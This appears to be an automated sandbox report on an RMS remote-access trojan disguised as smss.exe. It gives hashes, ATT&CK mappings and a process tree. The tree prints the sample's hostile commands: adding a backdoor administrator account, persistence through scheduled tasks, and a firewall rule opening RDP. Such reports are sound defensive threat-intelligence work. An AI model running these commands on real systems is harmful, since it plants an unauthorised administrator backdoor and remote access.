rms | 90f414ca8e7fe410a19ea1be7895f8b7df55b35d4289f1bd7c8900b2c886f4b4

Analysis

max time kernel
148s
max time network
150s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
26-08-2024 17:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

smss.exe
Size

9.4MB
MD5

6fde344165a369c3586a68317279247c
SHA1

e39b5038f44757a7049c4ebabbd6f62deb280796
SHA256

90f414ca8e7fe410a19ea1be7895f8b7df55b35d4289f1bd7c8900b2c886f4b4
SHA512

880650d5db061a4aab3df0c99ed1871de4347fb6ed7305c596fa4b75ec57e9c7acecebeeef675ba864d727a898963fe397af08a5d71e7993289299764931349a
SSDEEP

196608:uQmw1JCIvqD9gd1lqFxsPE41SfWj+gzjt5s9di7aH6CcvG:uQr9qFxOE41+Wj5zjLs9U7aaRvG

Score

10^/10

rms discovery evasion lateral_movement persistence privilege_escalation rat themida trojan

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

smss.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smss.exe
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

net1.execmd.exenet.exe

pid process

4892 net1.exe
4744 cmd.exe
488 net.exe
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

1980 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	smss.exe

pid	process
4892	net1.exe
4744	cmd.exe
488	net.exe

pid	process
1980	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

RDPWinst.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWinst.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

smss.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	smss.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

winserv.exewinserv.exewinserv.exewinserv.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation	winserv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation	winserv.exe

Executes dropped EXE 6 IoCs

Processes:

winserv.exewinserv.exewinserv.exeRDPWinst.exewinserv.exewinserv.exe

pid process

32 winserv.exe
4580 winserv.exe
4200 winserv.exe
3672 RDPWinst.exe
3344 winserv.exe
1704 winserv.exe
Loads dropped DLL 1 IoCs

Processes:

svchost.exe

pid process

4432 svchost.exe

pid	process
4432	svchost.exe

Themida packer 14 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/5008-0-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-2-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-3-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-4-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-5-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-7-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-8-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-9-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-6-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-27-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-29-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-53-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-55-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida
behavioral2/memory/5008-64-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

smss.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smss.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 ip-api.com

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	smss.exe

flow	ioc
7	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

RDPWinst.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWinst.exe

AutoIT Executable 12 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/memory/5008-3-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-4-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-5-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-7-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-8-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-9-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-6-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-27-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-29-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-53-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-55-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe
behavioral2/memory/5008-64-0x00007FF727370000-0x00007FF7283A3000-memory.dmp	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

smss.exe

pid process

5008 smss.exe

Drops file in Program Files directory 5 IoCs

Processes:

smss.exeRDPWinst.exesvchost.exe

description	ioc	process
File opened for modification	C:\Program Files\RDP Wrapper	smss.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	smss.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWinst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWinst.exe
File opened for modification	\??\c:\program files\rdp wrapper\rdpwrap.txt	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

winserv.exewinserv.exewinserv.exewinserv.exeRDPWinst.exewinserv.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWinst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

smss.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	smss.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2764 timeout.exe

pid	process
2764	timeout.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

winserv.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	winserv.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	winserv.exe

Modifies registry class 3 IoCs

Processes:

smss.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\MIME\Database	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	smss.exe

NTFS ADS 1 IoCs

Processes:

smss.exe

description ioc process

File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe
Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

1408 schtasks.exe
4440 schtasks.exe

description	ioc	process
File opened for modification	C:\ProgramData\Setup\winmgmts:\	smss.exe

pid	process
1408	schtasks.exe
4440	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

smss.exewinserv.exewinserv.exewinserv.exesvchost.exe

pid	process
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
32	winserv.exe
32	winserv.exe
32	winserv.exe
32	winserv.exe
32	winserv.exe
32	winserv.exe
4580	winserv.exe
4580	winserv.exe
4580	winserv.exe
4580	winserv.exe
4200	winserv.exe
4200	winserv.exe
4200	winserv.exe
4200	winserv.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe
5008	smss.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

624

pid	process
624

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

winserv.exewinserv.exeRDPWinst.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	32	winserv.exe
Token: SeTakeOwnershipPrivilege	4580	winserv.exe
Token: SeTcbPrivilege	4580	winserv.exe
Token: SeTcbPrivilege	4580	winserv.exe
Token: SeDebugPrivilege	3672	RDPWinst.exe
Token: SeAuditPrivilege	4432	svchost.exe

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

winserv.exewinserv.exewinserv.exewinserv.exewinserv.exe

pid	process
32	winserv.exe
32	winserv.exe
32	winserv.exe
32	winserv.exe
4580	winserv.exe
4580	winserv.exe
4580	winserv.exe
4580	winserv.exe
4200	winserv.exe
4200	winserv.exe
4200	winserv.exe
4200	winserv.exe
3344	winserv.exe
3344	winserv.exe
3344	winserv.exe
3344	winserv.exe
1704	winserv.exe
1704	winserv.exe
1704	winserv.exe
1704	winserv.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

smss.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exeRDPWinst.execmd.exe

description	pid	process	target process
PID 5008 wrote to memory of 1408	5008	smss.exe	schtasks.exe
PID 5008 wrote to memory of 1408	5008	smss.exe	schtasks.exe
PID 5008 wrote to memory of 4440	5008	smss.exe	schtasks.exe
PID 5008 wrote to memory of 4440	5008	smss.exe	schtasks.exe
PID 5008 wrote to memory of 32	5008	smss.exe	winserv.exe
PID 5008 wrote to memory of 32	5008	smss.exe	winserv.exe
PID 5008 wrote to memory of 32	5008	smss.exe	winserv.exe
PID 5008 wrote to memory of 2148	5008	smss.exe	cmd.exe
PID 5008 wrote to memory of 2148	5008	smss.exe	cmd.exe
PID 2148 wrote to memory of 4708	2148	cmd.exe	net.exe
PID 2148 wrote to memory of 4708	2148	cmd.exe	net.exe
PID 4708 wrote to memory of 4456	4708	net.exe	net1.exe
PID 4708 wrote to memory of 4456	4708	net.exe	net1.exe
PID 5008 wrote to memory of 5000	5008	smss.exe	cmd.exe
PID 5008 wrote to memory of 5000	5008	smss.exe	cmd.exe
PID 5000 wrote to memory of 1600	5000	cmd.exe	net.exe
PID 5000 wrote to memory of 1600	5000	cmd.exe	net.exe
PID 1600 wrote to memory of 3884	1600	net.exe	net1.exe
PID 1600 wrote to memory of 3884	1600	net.exe	net1.exe
PID 5008 wrote to memory of 2040	5008	smss.exe	cmd.exe
PID 5008 wrote to memory of 2040	5008	smss.exe	cmd.exe
PID 2040 wrote to memory of 3228	2040	cmd.exe	net.exe
PID 2040 wrote to memory of 3228	2040	cmd.exe	net.exe
PID 3228 wrote to memory of 3668	3228	net.exe	net1.exe
PID 3228 wrote to memory of 3668	3228	net.exe	net1.exe
PID 5008 wrote to memory of 1576	5008	smss.exe	cmd.exe
PID 5008 wrote to memory of 1576	5008	smss.exe	cmd.exe
PID 1576 wrote to memory of 4680	1576	cmd.exe	net.exe
PID 1576 wrote to memory of 4680	1576	cmd.exe	net.exe
PID 4680 wrote to memory of 1704	4680	net.exe	net1.exe
PID 4680 wrote to memory of 1704	4680	net.exe	net1.exe
PID 5008 wrote to memory of 3732	5008	smss.exe	cmd.exe
PID 5008 wrote to memory of 3732	5008	smss.exe	cmd.exe
PID 3732 wrote to memory of 3948	3732	cmd.exe	net.exe
PID 3732 wrote to memory of 3948	3732	cmd.exe	net.exe
PID 3948 wrote to memory of 5016	3948	net.exe	net1.exe
PID 3948 wrote to memory of 5016	3948	net.exe	net1.exe
PID 5008 wrote to memory of 644	5008	smss.exe	cmd.exe
PID 5008 wrote to memory of 644	5008	smss.exe	cmd.exe
PID 644 wrote to memory of 1436	644	cmd.exe	net.exe
PID 644 wrote to memory of 1436	644	cmd.exe	net.exe
PID 1436 wrote to memory of 4336	1436	net.exe	net1.exe
PID 1436 wrote to memory of 4336	1436	net.exe	net1.exe
PID 5008 wrote to memory of 4744	5008	smss.exe	cmd.exe
PID 5008 wrote to memory of 4744	5008	smss.exe	cmd.exe
PID 4744 wrote to memory of 488	4744	cmd.exe	net.exe
PID 4744 wrote to memory of 488	4744	cmd.exe	net.exe
PID 488 wrote to memory of 4892	488	net.exe	net1.exe
PID 488 wrote to memory of 4892	488	net.exe	net1.exe
PID 5008 wrote to memory of 3672	5008	smss.exe	RDPWinst.exe
PID 5008 wrote to memory of 3672	5008	smss.exe	RDPWinst.exe
PID 5008 wrote to memory of 3672	5008	smss.exe	RDPWinst.exe
PID 3672 wrote to memory of 1980	3672	RDPWinst.exe	netsh.exe
PID 3672 wrote to memory of 1980	3672	RDPWinst.exe	netsh.exe
PID 5008 wrote to memory of 5040	5008	smss.exe	WinMail.exe
PID 5008 wrote to memory of 5040	5008	smss.exe	WinMail.exe
PID 5008 wrote to memory of 3312	5008	smss.exe	cmd.exe
PID 5008 wrote to memory of 3312	5008	smss.exe	cmd.exe
PID 3312 wrote to memory of 2764	3312	cmd.exe	timeout.exe
PID 3312 wrote to memory of 2764	3312	cmd.exe	timeout.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\smss.exe
"C:\Users\Admin\AppData\Local\Temp\smss.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1408
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4440
- C:\ProgramData\Windows Tasks Service\winserv.exe
  "C:\ProgramData\Windows Tasks Service\winserv.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:32
- - C:\ProgramData\Windows Tasks Service\winserv.exe
    "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net user John 12345 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\system32\net.exe
    net user John 12345 /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4708
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user John 12345 /add
      4⤵
      PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\system32\net.exe
    net localgroup "Администраторы" John /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1600
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Администраторы" John /add
      4⤵
      PID:3884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\system32\net.exe
    net localgroup "Пользователи удаленного рабочего стола" John /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3228
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
      4⤵
      PID:3668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\system32\net.exe
    net localgroup "Пользователи удаленного управления" john /add" John /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
      4⤵
      PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3732
- - C:\Windows\system32\net.exe
    net localgroup "Administrators" John /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Administrators" John /add
      4⤵
      PID:5016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:644
- - C:\Windows\system32\net.exe
    net localgroup "Administradores" John /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Administradores" John /add
      4⤵
      PID:4336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:4744
- - C:\Windows\system32\net.exe
    net localgroup "Remote Desktop Users" john /add
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    - Suspicious use of WriteProcessMemory
    PID:488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      PID:4892
- C:\ProgramData\RDPWinst.exe
  C:\ProgramData\RDPWinst.exe -i
  2⤵
  - Server Software Component: Terminal Services DLL
  - Executes dropped EXE
  - Modifies WinLogon
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3672
- - C:\Windows\SYSTEM32\netsh.exe
    netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1980
- C:\Program Files\Windows Mail\WinMail.exe
  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
  2⤵
  PID:5040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3312
- - C:\Windows\system32\timeout.exe
    timeout 5
    3⤵
    - Delays execution with timeout.exe
    PID:2764

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4200

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s TermService
1⤵
PID:2236

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3344

C:\ProgramData\Windows Tasks Service\winserv.exe
"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RDPWinst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\ProgramData\Windows Tasks Service\settings.dat

Filesize
2KB

MD5
bc909d39981af556d07dc67178f61472

SHA1
a4e5b1c5bc746435a5baf11b728e83fb8e654da0

SHA256
10cf28ab39bf7ba76b91b043a007006d13d4a661fbcaad3d7820c19407b1e6a8

SHA512
acf34884a865cdabfbb9a49b948ccc74fe1e158636b23e2f728c2df6fd2fb7bda0929eeddf4bf58d90b034215dafa5e2c697050c51c2f2259ff77fa02d80f51a

Download Submit
C:\ProgramData\Windows Tasks Service\winserv.exe

Filesize
10.2MB

MD5
3f4f5a6cb95047fea6102bd7d2226aa9

SHA1
fc09dd898b6e7ff546e4a7517a715928fbafc297

SHA256
99fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98

SHA512
de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688

Download Submit
C:\Programdata\Install\del.bat

Filesize
315B

MD5
155557517f00f2afc5400ba9dc25308e

SHA1
77a53a8ae146cf1ade1c9d55bbd862cbeb6db940

SHA256
f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e

SHA512
40baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32

Download Submit
\??\PIPE\wkssvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
memory/32-21-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/32-24-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/1704-82-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
memory/3344-74-0x0000000000400000-0x0000000000E31000-memory.dmp

Filesize
10.2MB

Download
